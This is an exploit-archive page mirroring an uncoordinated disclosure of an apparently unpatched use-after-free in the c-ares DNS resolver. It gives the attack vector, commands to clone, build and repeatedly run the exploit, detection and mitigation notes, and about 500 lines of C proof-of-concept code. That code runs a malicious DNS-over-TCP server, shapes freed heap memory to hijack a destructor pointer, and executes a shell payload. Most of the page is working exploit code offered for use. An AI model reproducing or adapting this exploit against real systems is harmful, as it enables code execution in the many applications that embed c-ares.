PoC Archive PoC Archive
High None assigned as of 2026-07-03 unpatched

c-ares TCP ares_getaddrinfo() Use-After-Free Code Execution

by bikini (@ashdfrkl) — original discovery; mirrored via exploitarium · 2026-07-03

Severity
High
CVE
None assigned as of 2026-07-03
Category
network
Affected product
c-ares (async DNS resolver library)
Affected versions
Upstream main (c93e50f3ebc0373fe57677523ec960f6c1cb0e15) and latest release v1.34.6 (3ac47ee46edd8ea40370222f91613fc16c434853)
Disclosed
2026-07-03
Patch status
unpatched

Metadata

FieldValue
Date Added2026-07-03
Last Updated2026-06
Author / Researcherbikini (@ashdfrkl) — original discovery; mirrored via exploitarium
CVE / AdvisoryNone assigned as of 2026-07-03
Categorynetwork
SeverityHigh
CVSS ScoreNot yet scored (no CVE/CVSS assigned)
StatusPoC
Tagsc-ares, use-after-free, dns, resolver, tcp, heap-corruption, code-execution, edns
RelatedN/A

Affected Target

FieldValue
Software / Systemc-ares (async DNS resolver library)
Versions AffectedUpstream main (c93e50f3ebc0373fe57677523ec960f6c1cb0e15) and latest release v1.34.6 (3ac47ee46edd8ea40370222f91613fc16c434853)
Language / PlatformC, Linux/WSL, requires gcc/cmake/POSIX sockets
Authentication RequiredNo
Network Access RequiredYes (attacker acts as, or spoofs, the DNS-over-TCP server the victim resolver connects to)

Summary

c-ares’s ares_getaddrinfo() path over DNS-over-TCP with EDNS enabled contains a use-after-free reachable when a malicious or compromised DNS server sends two responses for the same query ID in a single TCP read — the first a FORMERR without OPT data (triggering EDNS retry handling) and the second a successful empty response — followed by a connection reset before internal cleanup runs. This stale-state condition causes c-ares to later dereference a freed ares_query_t structure during query cleanup, ultimately reaching an attacker-shaped indirect function-pointer call (node->parent->destruct(node->data)) inside ares_slist_node_destroy(). The included PoC shapes the freed allocation via c-ares’s public ares_library_init_mem() allocator hook to reliably redirect that destructor call to an arbitrary local function, which in this PoC writes a proof marker file and launches a calculator to demonstrate full control-flow hijack rather than a mere crash. It was verified against both current upstream main and the latest official release tag, and the researcher notes the bug is heap-layout sensitive so the harness retries until the marker is hit. This PoC was published by a pseudonymous independent researcher (bikini/ashdfrkl) as part of the uncoordinated “exploitarium” vulnerability dump; it has not been vendor-confirmed.


Vulnerability Details

Root Cause

During DNS-over-TCP resolution with ARES_FLAG_EDNS | ARES_FLAG_USEVC, receiving two responses for the same query ID in one read (a FORMERR retry followed by a success response) combined with a connection reset before the internal retry write completes leaves a stale ares_query_t.node_queries_by_timeout pointer. Later query cleanup dereferences this stale pointer and calls a destructor through it, reaching a use-after-free-controlled indirect call.

Attack Vector

  1. Attacker controls or spoofs a DNS server that the victim application resolves against over TCP with EDNS enabled.
  2. Victim application calls ares_getaddrinfo(), which opens a DNS-over-TCP connection and issues a query.
  3. Attacker’s server returns a FORMERR response (without OPT data) for the query ID, prompting c-ares’s EDNS retry logic.
  4. In the same read, attacker’s server also returns a successful empty response for the same query ID.
  5. c-ares accepts the retry write, then the attacker resets the TCP connection before the next internal lookup write completes.
  6. During subsequent query cleanup, c-ares consumes the now-stale query state and calls ares_slist_node_destroy(), which invokes a destructor pointer that the attacker’s allocator-hook-driven heap shaping has redirected to attacker-chosen code.

Impact

Use-after-free leading to attacker-influenced indirect call / control-flow hijack in any process linking c-ares that performs DNS-over-TCP lookups with EDNS against an attacker-influenced or on-path DNS server (Node.js, gRPC, Envoy, libcurl, Wireshark, and various Python/Rust DNS wrappers are named as potential consumers).


Environment / Lab Setup

Target:   c-ares (upstream main or v1.34.6) built from source, Linux/WSL
Attacker: gcc, cmake, git, POSIX sockets/pthreads; PoC drives its own loopback DNS-over-TCP server

Proof of Concept

PoC Script

See cares_tcp_uaf_calc_poc.c, build_from_checkout.sh, and run_until_hit.sh in this folder.

1
2
3
4
git clone --depth 1 https://github.com/c-ares/c-ares.git /tmp/c-ares-main
./build_from_checkout.sh /tmp/c-ares-main /tmp/c-ares-main-build ./cares_tcp_uaf_calc_poc
chmod +x ./cares_tcp_uaf_calc_poc
./run_until_hit.sh ./cares_tcp_uaf_calc_poc

build_from_checkout.sh compiles c-ares from a supplied checkout and statically links the PoC against it; run_until_hit.sh retries the harness (the heap-layout-sensitive trigger does not fire on every run) until the control-flow marker CARES_RCE_PAYLOAD_TRIGGERED is printed and a benign calculator is launched as proof of hijacked execution.


Detection & Indicators of Compromise

Signs of compromise:

  • Crash dumps or ASAN/GDB traces showing ares_slist_node_destroy calling into unexpected code
  • Applications linking c-ares crashing or behaving anomalously after resolving against untrusted/attacker-influenced DNS infrastructure
  • Anomalous child process spawns from services that only perform DNS resolution (e.g., a resolver process launching a shell or unexpected binary)

Remediation

ActionDetail
Primary fixNo vendor patch confirmed as of 2026-07-03 — monitor c-ares releases for an advisory; rebuild and redeploy all static consumers once available
Interim mitigationAvoid forcing DNS-over-TCP toward untrusted or attacker-influenced resolvers; sandbox DNS-heavy services; inventory statically bundled c-ares copies (Node.js, gRPC, Envoy, libcurl, Wireshark, pycares/aiodns, Rust c-ares crates) and monitor for abnormal exits

References


Notes

Mirrored from https://github.com/bikini/exploitarium (folder: c-ares-tcp-uaf-calc-poc) on 2026-07-03. No CVE has been assigned as of ingestion — this is an uncoordinated disclosure by a pseudonymous researcher; treat with appropriate caution pending vendor confirmation. The source README explicitly notes the trigger is heap-layout/probabilistic (“a clean run can exit normally,” requiring retries) and is a local control-flow proof rather than a universal drop-in exploit for every c-ares consumer.

cares_tcp_uaf_calc_poc.c
  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
#include <arpa/inet.h>
#include <errno.h>
#include <netinet/in.h>
#include <pthread.h>
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <sys/select.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <sys/wait.h>
#include <unistd.h>

#include "ares.h"

typedef struct {
  int port;
  int ready_fd;
  int udp_start;
} server_ctx_t;

typedef struct tracked_hdr {
  size_t size;
  uint64_t magic;
  struct tracked_hdr *next;
  uint64_t pad;
} tracked_hdr_t;

typedef void (*proof_destructor_t)(void *);

typedef struct proof_slist {
  void *rand_state;
  unsigned char rand_data[8];
  size_t rand_bits;
  void *head;
  size_t levels;
  void *tail;
  void *cmp;
  proof_destructor_t destruct;
  size_t cnt;
} proof_slist_t;

typedef struct proof_slist_node {
  void *data;
  struct proof_slist_node **prev;
  struct proof_slist_node **next;
  size_t levels;
  proof_slist_t *parent;
} proof_slist_node_t;

static int use_poison_allocator;
static int trace_allocator;
static int reuse_144;
static int control_call;
static unsigned char poison_byte = 0x43;
static tracked_hdr_t *free144;
static size_t alloc_seq;
static proof_slist_t *proof_list;
static proof_slist_node_t *proof_node;

static int should_shape_size(size_t size)
{
  return size == 144;
}

static void proof_marker(void *arg)
{
  const char msg[] = "CARES_RCE_PAYLOAD_TRIGGERED\n";
  const char cmd[] =
      "proof=/tmp/cares_rce_proof_${PPID}; "
      "printf 'c-ares control-flow payload reached pid=%s\\n' \"$$\" > \"$proof\"; "
      "ln -sf \"$proof\" /tmp/cares_rce_proof_latest 2>/dev/null || true; "
      "if [ -x /mnt/c/Windows/System32/cmd.exe ]; then "
      "  /mnt/c/Windows/System32/calc.exe >/dev/null 2>&1 || "
      "  /mnt/c/Windows/System32/cmd.exe /c start \"\" calc.exe >/dev/null 2>&1; "
      "elif [ -x /mnt/c/Windows/System32/calc.exe ]; then "
      "  /mnt/c/Windows/System32/calc.exe >/dev/null 2>&1; "
      "elif command -v xcalc >/dev/null 2>&1; then "
      "  xcalc >/dev/null 2>&1 & "
      "elif command -v gnome-calculator >/dev/null 2>&1; then "
      "  gnome-calculator >/dev/null 2>&1 & "
      "elif command -v kcalc >/dev/null 2>&1; then "
      "  kcalc >/dev/null 2>&1 & "
      "fi";
  pid_t pid;
  (void)arg;
  write(STDERR_FILENO, msg, sizeof(msg) - 1);
  pid = fork();
  if (pid == 0) {
    execl("/bin/sh", "sh", "-c", cmd, (char *)NULL);
    _exit(127);
  }
  if (pid > 0) {
    waitpid(pid, NULL, 0);
  }
  _exit(77);
}

static void *tracked_malloc(size_t size)
{
  tracked_hdr_t *hdr;
  if (reuse_144 && size == 144 && free144 != NULL) {
    hdr = free144;
    free144 = hdr->next;
    hdr->next = NULL;
    memset(hdr + 1, 0x52, size);
    if (trace_allocator) {
      fprintf(stderr, "ALLOC%zu reuse144 %p\n", ++alloc_seq, (void *)(hdr + 1));
    }
    return hdr + 1;
  }
  hdr = (tracked_hdr_t *)malloc(sizeof(*hdr) + size);
  if (hdr == NULL) {
    return NULL;
  }
  hdr->size = size;
  hdr->magic = 0xc0decafef00dbeefu;
  hdr->next = NULL;
  memset(hdr + 1, 0x55, size);
  if (trace_allocator && should_shape_size(size)) {
    fprintf(stderr, "ALLOC%zu size%zu %p\n", ++alloc_seq, size,
            (void *)(hdr + 1));
  }
  return hdr + 1;
}

static void ensure_proof_node(void)
{
  if (proof_list != NULL && proof_node != NULL) {
    return;
  }
  proof_list = (proof_slist_t *)tracked_malloc(sizeof(*proof_list));
  proof_node = (proof_slist_node_t *)tracked_malloc(sizeof(*proof_node));
  if (proof_list == NULL || proof_node == NULL) {
    abort();
  }
  memset(proof_list, 0, sizeof(*proof_list));
  memset(proof_node, 0, sizeof(*proof_node));
  proof_list->destruct = proof_marker;
  proof_list->cnt = 1;
  proof_node->data = proof_list;
  proof_node->levels = 0;
  proof_node->parent = proof_list;
}

static void tracked_free(void *ptr)
{
  tracked_hdr_t *hdr;
  if (ptr == NULL) {
    return;
  }
  hdr = ((tracked_hdr_t *)ptr) - 1;
  if (hdr->magic != 0xc0decafef00dbeefu) {
    abort();
  }
  if (trace_allocator && should_shape_size(hdr->size)) {
    fprintf(stderr, "FREE size%zu %p\n", hdr->size, ptr);
  }
  if (control_call && should_shape_size(hdr->size)) {
    ensure_proof_node();
    memset(ptr, 0, hdr->size);
    memcpy((unsigned char *)ptr + 48, &proof_node, sizeof(proof_node));
  } else {
    memset(ptr, poison_byte, hdr->size);
  }
  if (reuse_144 && hdr->size == 144) {
    hdr->next = free144;
    free144 = hdr;
  }
}

static void *tracked_realloc(void *ptr, size_t size)
{
  tracked_hdr_t *old_hdr;
  void *new_ptr;
  size_t copy_len;
  if (ptr == NULL) {
    return tracked_malloc(size);
  }
  if (size == 0) {
    tracked_free(ptr);
    return NULL;
  }
  old_hdr = ((tracked_hdr_t *)ptr) - 1;
  if (old_hdr->magic != 0xc0decafef00dbeefu) {
    abort();
  }
  new_ptr = tracked_malloc(size);
  if (new_ptr == NULL) {
    return NULL;
  }
  copy_len = old_hdr->size < size ? old_hdr->size : size;
  memcpy(new_ptr, ptr, copy_len);
  tracked_free(ptr);
  return new_ptr;
}

static void load_poison_byte(void)
{
  const char *env = getenv("CARES_PROOF_POISON_BYTE");
  char *end = NULL;
  unsigned long value;
  trace_allocator = getenv("CARES_PROOF_TRACE_ALLOC") != NULL;
  if (env == NULL || *env == '\0') {
    return;
  }
  value = strtoul(env, &end, 0);
  if (end != env && value <= 255) {
    poison_byte = (unsigned char)value;
  }
}


static int read_exact(int fd, unsigned char *buf, size_t len)
{
  size_t off = 0;
  while (off < len) {
    ssize_t n = recv(fd, buf + off, len - off, 0);
    if (n <= 0) {
      return -1;
    }
    off += (size_t)n;
  }
  return 0;
}

static size_t question_len(const unsigned char *msg, size_t len)
{
  size_t pos = 12;
  if (len < pos) {
    return 0;
  }
  while (pos < len && msg[pos] != 0) {
    unsigned int l = msg[pos++];
    if (l > 63 || pos + l > len) {
      return 0;
    }
    pos += l;
  }
  if (pos + 5 > len) {
    return 0;
  }
  return pos + 5 - 12;
}

static size_t make_dns(unsigned char *out, const unsigned char *query,
                       size_t query_len, unsigned char high_flags,
                       unsigned char low_flags, int tcp)
{
  size_t qlen = question_len(query, query_len);
  size_t dns_len = 12 + qlen;
  size_t off = tcp ? 2 : 0;
  if (qlen == 0) {
    return 0;
  }
  if (tcp) {
    out[0] = (unsigned char)(dns_len >> 8);
    out[1] = (unsigned char)(dns_len & 0xffu);
  }
  out[off + 0] = query[0];
  out[off + 1] = query[1];
  out[off + 2] = high_flags;
  out[off + 3] = low_flags;
  out[off + 4] = 0;
  out[off + 5] = 1;
  out[off + 6] = 0;
  out[off + 7] = 0;
  out[off + 8] = 0;
  out[off + 9] = 0;
  out[off + 10] = 0;
  out[off + 11] = 0;
  memcpy(out + off + 12, query + 12, qlen);
  return off + dns_len;
}

static void *server_thread(void *arg)
{
  server_ctx_t *ctx = (server_ctx_t *)arg;
  int s = -1;
  int u = -1;
  int c = -1;
  struct sockaddr_in sin;
  struct sockaddr_in peer;
  socklen_t slen;
  socklen_t plen;
  unsigned char hdr[2];
  unsigned char query[4096];
  unsigned char out[8192];
  unsigned char retry[4096];
  uint16_t qlen;
  size_t n1;
  size_t n2;
  struct linger linger_opt;

  s = socket(AF_INET, SOCK_STREAM, 0);
  if (s < 0) {
    return NULL;
  }
  memset(&sin, 0, sizeof(sin));
  sin.sin_family = AF_INET;
  sin.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
  sin.sin_port = 0;
  if (bind(s, (struct sockaddr *)&sin, sizeof(sin)) != 0) {
    close(s);
    return NULL;
  }
  if (listen(s, 1) != 0) {
    close(s);
    return NULL;
  }
  slen = sizeof(sin);
  if (getsockname(s, (struct sockaddr *)&sin, &slen) != 0) {
    close(s);
    return NULL;
  }
  ctx->port = ntohs(sin.sin_port);
  if (ctx->udp_start) {
    u = socket(AF_INET, SOCK_DGRAM, 0);
    if (u < 0) {
      close(s);
      return NULL;
    }
    memset(&sin, 0, sizeof(sin));
    sin.sin_family = AF_INET;
    sin.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
    sin.sin_port = htons((uint16_t)ctx->port);
    if (bind(u, (struct sockaddr *)&sin, sizeof(sin)) != 0) {
      close(u);
      close(s);
      return NULL;
    }
  }
  write(ctx->ready_fd, "R", 1);

  if (ctx->udp_start) {
    plen = sizeof(peer);
    ssize_t got = recvfrom(u, query, sizeof(query), 0,
                           (struct sockaddr *)&peer, &plen);
    if (got > 0) {
      n1 = make_dns(out, query, (size_t)got, 0x83, 0, 0);
      if (n1 != 0) {
        sendto(u, out, n1, MSG_NOSIGNAL, (struct sockaddr *)&peer, plen);
      }
    }
    close(u);
  }

  c = accept(s, NULL, NULL);
  if (c < 0) {
    close(s);
    return NULL;
  }
  if (read_exact(c, hdr, sizeof(hdr)) != 0) {
    close(c);
    close(s);
    return NULL;
  }
  qlen = (uint16_t)(((unsigned int)hdr[0] << 8) | hdr[1]);
  if (qlen > sizeof(query) || read_exact(c, query, qlen) != 0) {
    close(c);
    close(s);
    return NULL;
  }
  n1 = make_dns(out, query, qlen, 0x81, 1, 1);
  n2 = make_dns(out + n1, query, qlen, 0x81, 0, 1);
  if (n1 != 0 && n2 != 0) {
    send(c, out, n1 + n2, MSG_NOSIGNAL);
  }
  if (read_exact(c, hdr, sizeof(hdr)) == 0) {
    qlen = (uint16_t)(((unsigned int)hdr[0] << 8) | hdr[1]);
    if (qlen <= sizeof(retry)) {
      read_exact(c, retry, qlen);
    }
  }
  linger_opt.l_onoff = 1;
  linger_opt.l_linger = 0;
  setsockopt(c, SOL_SOCKET, SO_LINGER, &linger_opt, sizeof(linger_opt));
  close(c);
  close(s);
  return NULL;
}

static void ai_cb(void *arg, int status, int timeouts,
                  struct ares_addrinfo *res)
{
  int *done = (int *)arg;
  (void)status;
  (void)timeouts;
  if (res != NULL) {
    ares_freeaddrinfo(res);
  }
  *done = 1;
}

int main(int argc, char **argv)
{
  int pipefd[2];
  pthread_t tid;
  server_ctx_t ctx;
  ares_channel_t *channel = NULL;
  struct ares_options opts;
  struct ares_addrinfo_hints hints;
  char *search_domains[] = { (char *)"uaf.invalid" };
  int optmask = ARES_OPT_FLAGS | ARES_OPT_LOOKUPS | ARES_OPT_DOMAINS;
  char server[64];
  int done = 0;
  int loops = 0;
  int drain_after_done = 0;
  char ch;

  signal(SIGPIPE, SIG_IGN);
  memset(&ctx, 0, sizeof(ctx));
  if (argc > 1 && strcmp(argv[1], "udp") == 0) {
    ctx.udp_start = 1;
  }
  if (argc > 1 && strcmp(argv[1], "poison") == 0) {
    use_poison_allocator = 1;
  }
  if (argc > 1 && strcmp(argv[1], "reuse144") == 0) {
    use_poison_allocator = 1;
    reuse_144 = 1;
  }
  if (argc > 1 && strcmp(argv[1], "controlcall") == 0) {
    use_poison_allocator = 1;
    control_call = 1;
  }
  if (argc > 2 && strcmp(argv[2], "poison") == 0) {
    use_poison_allocator = 1;
  }
  if (argc > 2 && strcmp(argv[2], "reuse144") == 0) {
    use_poison_allocator = 1;
    reuse_144 = 1;
  }
  if (argc > 2 && strcmp(argv[2], "controlcall") == 0) {
    use_poison_allocator = 1;
    control_call = 1;
  }
  load_poison_byte();
  if (pipe(pipefd) != 0) {
    return 2;
  }
  ctx.ready_fd = pipefd[1];
  if (pthread_create(&tid, NULL, server_thread, &ctx) != 0) {
    return 2;
  }
  if (read(pipefd[0], &ch, 1) != 1) {
    return 2;
  }
  close(pipefd[0]);
  close(pipefd[1]);

  if (use_poison_allocator) {
    if (trace_allocator) {
      fprintf(stderr, "allocator mode poison=%02x reuse144=%d\n",
              (unsigned int)poison_byte, reuse_144);
    }
    ares_library_init_mem(ARES_LIB_INIT_ALL, tracked_malloc, tracked_free,
                          tracked_realloc);
  } else {
    ares_library_init(ARES_LIB_INIT_ALL);
  }
  memset(&opts, 0, sizeof(opts));
  opts.flags = ARES_FLAG_EDNS;
  if (!ctx.udp_start) {
    opts.flags |= ARES_FLAG_USEVC;
  }
  opts.lookups = (char *)"b";
  opts.domains = search_domains;
  opts.ndomains = 1;
  if (ares_init_options(&channel, &opts, optmask) != ARES_SUCCESS ||
      channel == NULL) {
    return 2;
  }
  snprintf(server, sizeof(server), "127.0.0.1:%d", ctx.port);
  if (ares_set_servers_ports_csv(channel, server) != ARES_SUCCESS) {
    return 2;
  }
  memset(&hints, 0, sizeof(hints));
  hints.ai_family = AF_INET;
  ares_getaddrinfo(channel, "example.com", "80", &hints, ai_cb, &done);

  if (control_call) {
    drain_after_done = 8;
  }
  while ((!done || drain_after_done-- > 0) && loops++ < 120) {
    fd_set rfds;
    fd_set wfds;
    int nfds;
    struct timeval tv;
    struct timeval *tvp;
    FD_ZERO(&rfds);
    FD_ZERO(&wfds);
    nfds = ares_fds(channel, &rfds, &wfds);
    if (nfds == 0) {
      break;
    }
    tvp = ares_timeout(channel, NULL, &tv);
    if (done && control_call && tvp != NULL &&
Showing 500 of 514 lines View full file on GitHub →